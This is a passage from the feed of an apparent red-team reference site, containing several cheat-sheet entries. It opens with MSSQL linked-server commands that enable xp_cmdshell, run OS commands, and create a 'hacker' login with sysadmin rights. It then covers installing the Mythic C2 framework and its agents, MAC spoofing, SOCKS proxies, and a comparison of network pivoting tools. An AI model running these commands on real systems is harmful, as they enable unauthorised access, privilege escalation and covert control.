&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXECUTE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sp_configure &amp;#39;&amp;#39;xp_cmdshell&amp;#39;&amp;#39;,1;reconfigure;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;LinkedServer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;openquery&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;linkedserver&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;select 1;exec master..xp_cmdshell &amp;#34;dir c:&amp;#34;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;-- create user and give admin privileges
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXECUTE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;EXECUTE(&amp;#39;&amp;#39;CREATE LOGIN hacker WITH PASSWORD = &amp;#39;&amp;#39;&amp;#39;&amp;#39;P@ssword123.&amp;#39;&amp;#39;&amp;#39;&amp;#39; &amp;#39;&amp;#39;) AT &amp;#34;DOMINIO\SERVER1&amp;#34;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;DOMINIO\SERVER2&amp;#34;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXECUTE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;EXECUTE(&amp;#39;&amp;#39;sp_addsrvrolemember &amp;#39;&amp;#39;&amp;#39;&amp;#39;hacker&amp;#39;&amp;#39;&amp;#39;&amp;#39; , &amp;#39;&amp;#39;&amp;#39;&amp;#39;sysadmin&amp;#39;&amp;#39;&amp;#39;&amp;#39; &amp;#39;&amp;#39;) AT &amp;#34;DOMINIO\SERVER1&amp;#34;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;DOMINIO\SERVER2&amp;#34;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="crawl-links-for-instances-in-the-domain" class="anchored-heading"&gt;Crawl Links for Instances in the Domain&lt;a class="heading-anchor" href="#crawl-links-for-instances-in-the-domain" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results&lt;/p&gt;</description></item><item><title>Mythic C2</title><link>https://bokkapig.pages.dev/refs/internal/command-control/mythic/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/command-control/mythic/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#installation"&gt;Installation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#agents"&gt;Agents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#profiles"&gt;Profiles&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="installation" class="anchored-heading"&gt;Installation&lt;a class="heading-anchor" href="#installation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;build-essential&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;git&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;its-a&lt;/span&gt;&lt;span class="n"&gt;-feature&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Mythic&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-depth&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;install_docker_ubuntu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;sh&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;install_docker_debian&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;sh&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;&lt;span class="n"&gt;Mythic&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;make&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="nb"&gt;start
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="agents" class="anchored-heading"&gt;Agents&lt;a class="heading-anchor" href="#agents" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://mythicmeta.github.io/overview/agent_matrix.html"&gt;Mythic Community Agent Feature Matrix&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Agents can be found at: &lt;a href="https://github.com/MythicAgents"&gt;https://github.com/MythicAgents&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MythicAgents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Medusa&lt;/span&gt; &lt;span class="c"&gt;# A Mythic Agent compatible Python 2.7 and 3.8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MythicAgents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Hannibal&lt;/span&gt; &lt;span class="c"&gt;# A Mythic Agent written in PIC C&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MythicAgents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;thanatos&lt;/span&gt; &lt;span class="c"&gt;# A Mythic C2 agent targeting Linux and Windows hosts written in Rust&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MythicAgents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;poseidon&lt;/span&gt; &lt;span class="c"&gt;# A Mythic Agent written in Golang for Linux/MacOS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MythicAgents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Apollo&lt;/span&gt; &lt;span class="c"&gt;# # A Mythic Agent written in C# using the 4.0 .NET Framework &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MythicAgents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Athena&lt;/span&gt; &lt;span class="c"&gt;# A Mythic Agent written in .NET&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="nb"&gt;mythic-cli&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;github&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;MythicAgents&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Xenon&lt;/span&gt; &lt;span class="c"&gt;# A Mythic Agent written in C, compatible with httpx profiles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="profiles" class="anchored-heading"&gt;Profiles&lt;a class="heading-anchor" href="#profiles" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;C2 Profiles can be found at: &lt;a href="https://github.com/MythicC2Profiles"&gt;https://github.com/MythicC2Profiles&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Network Discovery</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/network-discovery/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/network-discovery/</guid><description>&lt;h2 id="mac-address" class="anchored-heading"&gt;MAC Address&lt;a class="heading-anchor" href="#mac-address" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://mac2vendor.com/"&gt;mac2vendor.com&lt;/a&gt; - OUI Database Lookup&lt;/li&gt;
&lt;li&gt;&lt;a href="https://oui.is/"&gt;oui.is&lt;/a&gt; - MAC Address Vendor Lookup&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;MAC Prefix&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;FC:D4:F2&lt;/td&gt;
 &lt;td&gt;Coca Cola Company&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;00:9E:C8&lt;/td&gt;
 &lt;td&gt;Xiaomi Communications&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;08:9E:08&lt;/td&gt;
 &lt;td&gt;Google&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;ifconfig&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;interface-name&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;down&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;ifconfig&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;interface-name&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;hw&lt;/span&gt; &lt;span class="n"&gt;ether&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;new-mac&lt;/span&gt;&lt;span class="n"&gt;-address&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;ifconfig&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;interface-name&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;up&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="dhcp" class="anchored-heading"&gt;DHCP&lt;a class="heading-anchor" href="#dhcp" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;DHCP (Dynamic Host Configuration Protocol) is a networking protocol used to automatically assign IP addresses and other network configuration parameters to devices on a network. DHCP allows devices to obtain necessary network configuration information from a DHCP server, rather than having to be manually configured.&lt;/p&gt;</description></item><item><title>Network Pivoting Techniques</title><link>https://bokkapig.pages.dev/refs/internal/redteam/pivoting/network-pivoting-techniques/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/pivoting/network-pivoting-techniques/</guid><description>&lt;h2 id="socks-proxy" class="anchored-heading"&gt;SOCKS Proxy&lt;a class="heading-anchor" href="#socks-proxy" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="socks-compatibility-table" class="anchored-heading"&gt;SOCKS Compatibility Table&lt;a class="heading-anchor" href="#socks-compatibility-table" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;SOCKS Version&lt;/th&gt;
 &lt;th style="text-align: center"&gt;TCP&lt;/th&gt;
 &lt;th style="text-align: center"&gt;UDP&lt;/th&gt;
 &lt;th style="text-align: center"&gt;IPv4&lt;/th&gt;
 &lt;th style="text-align: center"&gt;IPv6&lt;/th&gt;
 &lt;th style="text-align: center"&gt;Hostname&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;SOCKS v4&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;❌&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;❌&lt;/td&gt;
 &lt;td style="text-align: center"&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SOCKS v4a&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;❌&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;❌&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SOCKS v5&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;td style="text-align: center"&gt;✅&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="socks-proxy-usage" class="anchored-heading"&gt;SOCKS Proxy Usage&lt;a class="heading-anchor" href="#socks-proxy-usage" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;h4 id="proxychains" class="anchored-heading"&gt;Proxychains&lt;a class="heading-anchor" href="#proxychains" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/rofl0r/proxychains-ng"&gt;rofl0r/proxychains-ng&lt;/a&gt; - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/haad/proxychains"&gt;haad/proxychains&lt;/a&gt; - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: &amp;ldquo;user/pass&amp;rdquo; for SOCKS4/5, &amp;ldquo;basic&amp;rdquo; for HTTP.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Edit the &lt;strong&gt;configuration file&lt;/strong&gt; &lt;code&gt;/etc/proxychains.conf&lt;/code&gt; to add the SOCKS proxies.&lt;/p&gt;</description></item><item><title>Network Pivoting Tools</title><link>https://bokkapig.pages.dev/refs/internal/redteam/pivoting/network-pivoting-tools/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/pivoting/network-pivoting-tools/</guid><description>&lt;h2 id="tools-comparison" class="anchored-heading"&gt;Tools Comparison&lt;a class="heading-anchor" href="#tools-comparison" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Comparison table showing platform support (Windows, Linux, macOS), available polling methods (HTTPS, WebSockets), and supported SOCKS versions (4/5).&lt;/p&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Name&lt;/th&gt;
 &lt;th&gt;SOCKS4&lt;/th&gt;
 &lt;th&gt;SOCKS5&lt;/th&gt;
 &lt;th&gt;SOCKET&lt;/th&gt;
 &lt;th&gt;HTTPS&lt;/th&gt;
 &lt;th&gt;Web Socket&lt;/th&gt;
 &lt;th&gt;Windows&lt;/th&gt;
 &lt;th&gt;Linux&lt;/th&gt;
 &lt;th&gt;MacOS&lt;/th&gt;
 &lt;th&gt;Tun Interface&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;SSH&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;reGeorg&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;pivotnacci&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;wstunnel&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;chisel&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;revsocks&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;ligolo-ng&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;gost&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;rpivot&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;✅&lt;/td&gt;
 &lt;td&gt;❌&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="wstunnel" class="anchored-heading"&gt;wstunnel&lt;a class="heading-anchor" href="#wstunnel" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/erebe/wstunnel"&gt;erebe/wstunnel&lt;/a&gt; - Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;wstunnel&lt;/span&gt; &lt;span class="n"&gt;server&lt;/span&gt; &lt;span class="n"&gt;wss&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//[::]&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;8080&lt;/span&gt;
